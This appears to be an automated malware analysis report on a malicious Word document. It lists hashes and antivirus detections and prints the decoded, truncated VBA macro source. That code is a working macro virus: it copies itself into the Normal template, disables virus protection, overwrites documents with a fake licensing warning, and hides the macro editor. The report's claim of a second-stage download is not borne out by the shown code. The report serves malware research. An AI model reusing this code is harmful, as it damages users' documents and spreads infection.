Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ad8545a58153db97…

MALICIOUS

Office (OLE)

36.0 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 53116b0b7e38d7ecba006a53c3dc0ce3 SHA-1: 17ca8e012ebc7c509cdd53a03a3dd69cd3dfffdd SHA-256: ad8545a58153db97222d563074e5f8b3f35a495357ba2af1cd23f7f8a219c27e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro attempts to overwrite the document content with a fake licensing warning, likely as a distraction or to coerce the user. The presence of the 'Doc.Trojan.Marker-36' and 'Win.Trojan.C-286' ClamAV detections strongly indicates malicious intent, likely to download and execute a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-36 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-36
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15447 bytes
SHA-256: fa8c25e396f21e064a380595c67cbc859fdfc495716fa4a8bfdb9f36c8fefd72
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True








































































Private Sub Document_Close()
On Error Resume Next
    Dim myDate As Date
    myDate = #12/13/2000#
    Dim SaveDOC, SaveDOT, DI, NI As Boolean
    Dim ad, nt As Object
    Dim rixCode As String
    Const mmX = "M-M-x"
'Tarlac State University Sucks
    Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
    DI = ad.CodeModule.Find(mmX, 1, 1, 10000, 10000)
    NI = nt.CodeModule.Find(mmX, 1, 1, 10000, 10000)
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
        If Date >= myDate Then
            With Selection
                .WholeStory
                .Delete Unit:=wdCharacter, Count:=1
                .TypeText Text:="Sorry, Microsoft has determined that this copy of MS Word is not licensed!"
                .TypeParagraph
                .TypeText Text:="It is illegal to use this product. You have been warned!!!!!"
                .TypeParagraph
                .TypeText Text:="Please use/buy an original licensed copy of this product. Thank you"
            End With
            ActiveDocument.Save
        End If
'AMA CLC Tarlac Sucks
'*********************************
    If (DI = True Xor NI = True) And _
       (ActiveDocument.SaveFormat = wdFormatDocument Or _
       ActiveDocument.SaveFormat = wdFormatTemplate) Then
'DOT
      If DI = True Then
        SaveDOT = NormalTemplate.Saved
        rixCode = ad.CodeModule.Lines(1, 75)
        rixCode = rixCode & vbCrLf & vbTab & "myDate=#" & makeMyDate & "#"
        rixCode = rixCode & vbCrLf & ad.CodeModule.Lines(77, ad.CodeModule.CountOfLines)
        rixCode = rixCode & vbCrLf & "' " & Format(Time, "HH.MM.SS-") & Format(Date, "mm.dd.yy")
        nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
        nt.CodeModule.AddFromString rixCode
        If SaveDOT = True Then NormalTemplate.Save
      End If
'STI Tarlac Sucks
'DOC
      If NI = True And DI = False Or ActiveDocument.Saved = False Then
        SaveDOC = ActiveDocument.Saved
        rixCode = nt.CodeModule.Lines(1, 75)
        rixCode = rixCode & vbCrLf & vbTab & "myDate=#" & makeMyDate & "#"
        rixCode = rixCode & vbCrLf & nt.CodeModule.Lines(77, nt.CodeModule.CountOfLines)
        rixCode = rixCode & vbCrLf & "' " & Format(Time, "HH.MM.SS-") & Format(Date, "mm.dd.yy")
        ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
        ad.CodeModule.AddFromString rixCode
        If SaveDOC = True Then ActiveDocument.Save
      End If
    End If
'All the rest sucks even more
End Sub

Private Sub Document_Open()
On Error Resume Next
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
        .SavePropertiesPrompt = False
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    CommandBars("Control Toolbox").Visible = False
    CommandBars("Control Toolbox").Enabled = False
    CommandBars("Control Toolbox").Protection = msoBarNoChangeVisible
    CommandBars("Control Toolbox").Protection = msoBarNoCustomize
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Delete
    CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
End Sub

Private Function makeMyDate() As Date
    Dim dM, dD, dY 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.